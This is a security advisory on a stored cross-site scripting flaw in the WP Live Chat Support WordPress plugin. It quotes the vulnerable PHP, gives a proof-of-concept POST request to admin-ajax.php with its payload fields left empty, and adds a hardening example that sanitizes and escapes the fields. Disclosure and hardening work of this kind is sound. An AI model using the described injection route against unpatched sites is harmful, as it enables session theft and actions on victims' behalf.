------------------------------------------------------------------------
Stored Cross-Site Scripting vulnerability in WP Live Chat Support WordPress Plugin
------------------------------------------------------------------------
Dennis Kerdijk & Erwin Kievith, July 2016
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A stored Cross-Site Scripting vulnerability was found in the WP Live Chat Support WordPress Plugin. This issue can be exploited by an unauthenticated user. It allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.
------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0010
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WP Live Chat Support [2] WordPress Plugin version 6.2.03.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in WP Live Chat Support version 6.2.04 [3].
------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
WP Live Chat Support [2] allows chatting with visitors of a WordPress site. A persistent Cross-Site Scripting vulnerability has been discovered in WP Live Chat Support allowing an attacker to execute actions on behalf of a logged on WordPress user. A stored Cross-Site Scripting vulnerability was found in the WP Live Chat Support WordPress Plugin. This issue can be exploited by an unauthenticated user.
It allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The vulnerability exists in the file wp-live-chat-support/functions.php (line 1233), which is called from the file wp-live-chat-support/wp-live-chat-support.php (line 602). The name, email and msg POST parameters are stored in the offline messages table without any sanitization and are later rendered unescaped on the Offline Messages admin page.

wp-live-chat-support/wp-live-chat-support.php:

600 if ($_POST['action'] == "wplc_user_send_offline_message") {
601     if(function_exists('wplc_send_offline_msg')){ wplc_send_offline_msg($_POST['name'], $_POST['email'], $_POST['msg'], $_POST['cid']); }
602     if(function_exists('wplc_store_offline_message')){ wplc_store_offline_message($_POST['name'], $_POST['email'], $_POST['msg']); }
603     do_action("wplc_hook_offline_message",array(
604         "cid"=>$_POST['cid'],
605         "name"=>$_POST['name'],
606         "email"=>$_POST['email'],
607         "url"=>get_site_url(),
608         "msg"=>$_POST['msg']
609         )
610     );
611 }

wp-live-chat-support/functions.php:

1206 function wplc_store_offline_message($name, $email, $message){
1207     global $wpdb;
1208     global $wplc_tblname_offline_msgs;
1209
1210     $wplc_settings = get_option('WPLC_SETTINGS');
1211
1212     if(isset($wplc_settings['wplc_record_ip_address']) && $wplc_settings['wplc_record_ip_address'] == 1){
1213         if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'] != '') {
1214             $ip_address = $_SERVER['HTTP_X_FORWARDED_FOR'];
1215         } else {
1216             $ip_address = $_SERVER['REMOTE_ADDR'];
1217         }
1218         $offline_ip_address = $ip_address;
1219     } else {
1220         $offline_ip_address = "";
1221     }
1222
1223
1224     $ins_array = array(
1225         'timestamp' => current_time('mysql'),
1226         'name' => $name,
1227         'email' => $email,
1228         'message' => $message,
1229         'ip' => $offline_ip_address,
1230         'user_agent' => $_SERVER['HTTP_USER_AGENT']
1231     );
1232
1233     $rows_affected = $wpdb->insert( $wplc_tblname_offline_msgs, $ins_array );
1234     return;
1235 }

The vulnerability can be exploited using a specially crafted POST request. The victim needs to view the WP Live Chat Offline Messages page to trigger the Cross-Site Scripting payload. It should be noted that the offline message functionality is available even if there is a logged on chat user present.
------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
POST /wp-admin/admin-ajax.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 361
Connection: close

action=wplc_user_send_offline_message&security=8d1fc19e30&cid=1&name=&email=Mail&msg=
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_wp_live_chat_support_wordpress_plugin.html
[2] https://wordpress.org/plugins/wp-live-chat-support/
[3] https://downloads.wordpress.org/plugin/wp-live-chat-support.zip
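------------------------------------------------------------------------
Hardening example (added)
------------------------------------------------------------------------
The following is an added example and not the plugin's own code or its 6.2.04 fix: it shows how wplc_store_offline_message() from the Details section could sanitize every request-controlled field before the $wpdb->insert() on line 1233, and how the Offline Messages page should escape those columns at render time. The _hardened function names are assumed for illustration; the sanitize_*, esc_* and wp_kses helpers are standard WordPress functions.

```php
<?php
// Added example, not the plugin's code: input sanitization on the store side
// of wplc_store_offline_message() and output escaping on the render side.

function wplc_store_offline_message_hardened($name, $email, $message) {
    global $wpdb;
    global $wplc_tblname_offline_msgs;

    $wplc_settings = get_option('WPLC_SETTINGS');
    $offline_ip_address = '';
    if (isset($wplc_settings['wplc_record_ip_address']) && $wplc_settings['wplc_record_ip_address'] == 1) {
        // X-Forwarded-For is a client-supplied header that ends up stored and
        // displayed like the other fields, so validate it as an IP or drop it.
        $candidate = !empty($_SERVER['HTTP_X_FORWARDED_FOR'])
            ? trim(explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])[0])
            : $_SERVER['REMOTE_ADDR'];
        $offline_ip_address = filter_var($candidate, FILTER_VALIDATE_IP) ? $candidate : '';
    }

    $ins_array = array(
        'timestamp'  => current_time('mysql'),
        'name'       => sanitize_text_field($name),       // strips tags, control chars
        'email'      => sanitize_email($email),           // '' when not a valid address
        'message'    => wp_kses($message, array()),       // no HTML allowed, keeps newlines
        'ip'         => $offline_ip_address,
        'user_agent' => sanitize_text_field(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''),
    );

    // $wpdb->insert() already parameterizes values; the stored XSS in the
    // advisory comes from rendering these columns unescaped, not from SQL.
    return $wpdb->insert($wplc_tblname_offline_msgs, $ins_array);
}

// Render side: escape at the point of output regardless of what is stored,
// so rows written by the unpatched version are displayed safely as well.
function wplc_render_offline_message_row_hardened($row) {
    return '<tr>'
        . '<td>' . esc_html($row->timestamp) . '</td>'
        . '<td>' . esc_html($row->name) . '</td>'
        . '<td><a href="' . esc_url('mailto:' . $row->email) . '">' . esc_html($row->email) . '</a></td>'
        . '<td>' . nl2br(esc_html($row->message)) . '</td>'
        . '<td>' . esc_html($row->ip) . '</td>'
        . '<td>' . esc_html($row->user_agent) . '</td>'
        . '</tr>';
}
```

Sanitizing on store alone would leave messages already present in the table untouched, which is why the escaping in the render function is the part that actually closes the stored XSS.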